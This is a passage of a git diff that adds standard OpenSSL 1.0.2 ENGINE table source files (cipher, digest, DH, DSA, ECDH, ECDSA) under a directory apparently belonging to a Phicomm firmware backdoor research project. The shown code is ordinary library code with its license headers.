+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_cipher_engine(), the function
+ * that is used by EVP to hook in cipher code and cache defaults (etc), will
+ * display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_CIPHER_DEBUG */
+
+static ENGINE_TABLE *cipher_table = NULL;
+
+void ENGINE_unregister_ciphers(ENGINE *e)
+{
+    engine_table_unregister(&cipher_table, e);
+}
+
+static void engine_unregister_all_ciphers(void)
+{
+    engine_table_cleanup(&cipher_table);
+}
+
+int ENGINE_register_ciphers(ENGINE *e)
+{
+    if (e->ciphers) {
+        const int *nids;
+        int num_nids = e->ciphers(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&cipher_table,
+                                         engine_unregister_all_ciphers, e,
+                                         nids, num_nids, 0);
+    }
+    return 1;
+}
+
+void ENGINE_register_all_ciphers()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_ciphers(e);
+}
+
+int ENGINE_set_default_ciphers(ENGINE *e)
+{
+    if (e->ciphers) {
+        const int *nids;
+        int num_nids = e->ciphers(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&cipher_table,
+                                         engine_unregister_all_ciphers, e,
+                                         nids, num_nids, 1);
+    }
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references) for a given cipher 'nid'
+ */
+ENGINE *ENGINE_get_cipher_engine(int nid)
+{
+    return engine_table_select(&cipher_table, nid);
+}
+
+/* Obtains a cipher implementation from an ENGINE functional reference */
+const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid)
+{
+    const EVP_CIPHER *ret;
+    ENGINE_CIPHERS_PTR fn = ENGINE_get_ciphers(e);
+    if (!fn || !fn(e, &ret, NULL, nid)) {
+        ENGINEerr(ENGINE_F_ENGINE_GET_CIPHER, ENGINE_R_UNIMPLEMENTED_CIPHER);
+        return NULL;
+    }
+    return ret;
+}
+
+/* Gets the cipher callback from an ENGINE structure */
+ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e)
+{
+    return e->ciphers;
+}
+
+/* Sets the cipher callback in an ENGINE structure */
+int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f)
+{
+    e->ciphers = f;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dh.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dh.c
new file mode 100644
index 0000000..8114afa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dh.c
@@ -0,0 +1,124 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_DH(), the function that
+ * is used by DH to hook in implementation code and cache defaults (etc),
+ * will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_DH_DEBUG */
+
+static ENGINE_TABLE *dh_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_DH(ENGINE *e)
+{
+    engine_table_unregister(&dh_table, e);
+}
+
+static void engine_unregister_all_DH(void)
+{
+    engine_table_cleanup(&dh_table);
+}
+
+int ENGINE_register_DH(ENGINE *e)
+{
+    if (e->dh_meth)
+        return engine_table_register(&dh_table,
+                                     engine_unregister_all_DH, e, &dummy_nid,
+                                     1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_DH()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_DH(e);
+}
+
+int ENGINE_set_default_DH(ENGINE *e)
+{
+    if (e->dh_meth)
+        return engine_table_register(&dh_table,
+                                     engine_unregister_all_DH, e, &dummy_nid,
+                                     1, 1);
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_DH(void)
+{
+    return engine_table_select(&dh_table, dummy_nid);
+}
+
+/* Obtains an DH implementation from an ENGINE functional reference */
+const DH_METHOD *ENGINE_get_DH(const ENGINE *e)
+{
+    return e->dh_meth;
+}
+
+/* Sets an DH implementation in an ENGINE structure */
+int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth)
+{
+    e->dh_meth = dh_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_digest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_digest.c
new file mode 100644
index 0000000..de1ad9c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_digest.c
@@ -0,0 +1,143 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_digest_engine(), the function
+ * that is used by EVP to hook in digest code and cache defaults (etc), will
+ * display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_DIGEST_DEBUG */
+
+static ENGINE_TABLE *digest_table = NULL;
+
+void ENGINE_unregister_digests(ENGINE *e)
+{
+    engine_table_unregister(&digest_table, e);
+}
+
+static void engine_unregister_all_digests(void)
+{
+    engine_table_cleanup(&digest_table);
+}
+
+int ENGINE_register_digests(ENGINE *e)
+{
+    if (e->digests) {
+        const int *nids;
+        int num_nids = e->digests(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&digest_table,
+                                         engine_unregister_all_digests, e,
+                                         nids, num_nids, 0);
+    }
+    return 1;
+}
+
+void ENGINE_register_all_digests()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_digests(e);
+}
+
+int ENGINE_set_default_digests(ENGINE *e)
+{
+    if (e->digests) {
+        const int *nids;
+        int num_nids = e->digests(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&digest_table,
+                                         engine_unregister_all_digests, e,
+                                         nids, num_nids, 1);
+    }
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references) for a given digest 'nid'
+ */
+ENGINE *ENGINE_get_digest_engine(int nid)
+{
+    return engine_table_select(&digest_table, nid);
+}
+
+/* Obtains a digest implementation from an ENGINE functional reference */
+const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid)
+{
+    const EVP_MD *ret;
+    ENGINE_DIGESTS_PTR fn = ENGINE_get_digests(e);
+    if (!fn || !fn(e, &ret, NULL, nid)) {
+        ENGINEerr(ENGINE_F_ENGINE_GET_DIGEST, ENGINE_R_UNIMPLEMENTED_DIGEST);
+        return NULL;
+    }
+    return ret;
+}
+
+/* Gets the digest callback from an ENGINE structure */
+ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e)
+{
+    return e->digests;
+}
+
+/* Sets the digest callback in an ENGINE structure */
+int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f)
+{
+    e->digests = f;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dsa.c
new file mode 100644
index 0000000..c1f57f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dsa.c
@@ -0,0 +1,124 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_DSA(), the function that
+ * is used by DSA to hook in implementation code and cache defaults (etc),
+ * will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_DSA_DEBUG */
+
+static ENGINE_TABLE *dsa_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_DSA(ENGINE *e)
+{
+    engine_table_unregister(&dsa_table, e);
+}
+
+static void engine_unregister_all_DSA(void)
+{
+    engine_table_cleanup(&dsa_table);
+}
+
+int ENGINE_register_DSA(ENGINE *e)
+{
+    if (e->dsa_meth)
+        return engine_table_register(&dsa_table,
+                                     engine_unregister_all_DSA, e, &dummy_nid,
+                                     1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_DSA()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_DSA(e);
+}
+
+int ENGINE_set_default_DSA(ENGINE *e)
+{
+    if (e->dsa_meth)
+        return engine_table_register(&dsa_table,
+                                     engine_unregister_all_DSA, e, &dummy_nid,
+                                     1, 1);
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_DSA(void)
+{
+    return engine_table_select(&dsa_table, dummy_nid);
+}
+
+/* Obtains an DSA implementation from an ENGINE functional reference */
+const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e)
+{
+    return e->dsa_meth;
+}
+
+/* Sets an DSA implementation in an ENGINE structure */
+int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth)
+{
+    e->dsa_meth = dsa_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdh.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdh.c
new file mode 100644
index 0000000..c51441b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdh.c
@@ -0,0 +1,139 @@
+/* crypto/engine/tb_ecdh.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The ECDH engine software is originally written by Nils Gura and
+ * Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_ECDH(), the function
+ * that is used by ECDH to hook in implementation code and cache defaults
+ * (etc), will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_ECDH_DEBUG */
+
+static ENGINE_TABLE *ecdh_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_ECDH(ENGINE *e)
+{
+    engine_table_unregister(&ecdh_table, e);
+}
+
+static void engine_unregister_all_ECDH(void)
+{
+    engine_table_cleanup(&ecdh_table);
+}
+
+int ENGINE_register_ECDH(ENGINE *e)
+{
+    if (e->ecdh_meth)
+        return engine_table_register(&ecdh_table,
+                                     engine_unregister_all_ECDH, e,
+                                     &dummy_nid, 1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_ECDH()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_ECDH(e);
+}
+
+int ENGINE_set_default_ECDH(ENGINE *e)
+{
+    if (e->ecdh_meth)
+        return engine_table_register(&ecdh_table,
+                                     engine_unregister_all_ECDH, e,
+                                     &dummy_nid, 1, 1);
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_ECDH(void)
+{
+    return engine_table_select(&ecdh_table, dummy_nid);
+}
+
+/* Obtains an ECDH implementation from an ENGINE functional reference */
+const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e)
+{
+    return e->ecdh_meth;
+}
+
+/* Sets an ECDH implementation in an ENGINE structure */
+int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *ecdh_meth)
+{
+    e->ecdh_meth = ecdh_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdsa.c
new file mode 100644
index 0000000..a8b9be6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdsa.c
@@ -0,0 +1,124 @@
+/* ====================================================================
+ * Copyright (c) 2000-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_ECDSA(), the function
+ * that is used by ECDSA to hook in implementation code and cache defaults
+ * (etc), will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_ECDSA_DEBUG */
+
+static ENGINE_TABLE *ecdsa_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_ECDSA(ENGINE *e)
+{
+    engine_table_unregister(&ecdsa_table, e);
+}
+
+static void engine_unregister_all_ECDSA(void)
+{
+    engine_table_cleanup(&ecdsa_table);
+}
+
+int ENGINE_register_ECDSA(ENGINE *e)
+{
+    if (e->ecdsa_meth)
+        return engine_table_register(&ecdsa_table,
+                                     engine_unregister_all_ECDSA, e,
+                                     &dummy_nid, 1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_ECDSA()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_ECDSA(e);
+}
+
+int ENGINE_set_default_ECDSA(ENGINE *e)
+{
+    if (e->ecdsa_meth)
+        return engine_table_register(&ecdsa_table,
+                                     engine_unregister_all_ECDSA, e,
+                                     &dummy_nid, 1, 1);
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_ECDSA(void)
+{
+    return engine_table_select(&ecdsa_table, dummy_nid);
+}
+
+/* Obtains an ECDSA implementation from an ENGINE functional reference */
+const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e)
+{
+    return e->ecdsa_meth;
+}
+
+/* Sets an ECDSA implementation in an ENGINE structure */
+int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *ecdsa_meth)
+{
+    e->ecdsa_meth = ecdsa_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_pkmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_pkmeth.c
new file mode 100644
index 0000000..29e65be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_pkmeth.c
@@ -0,0 +1,166 @@
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
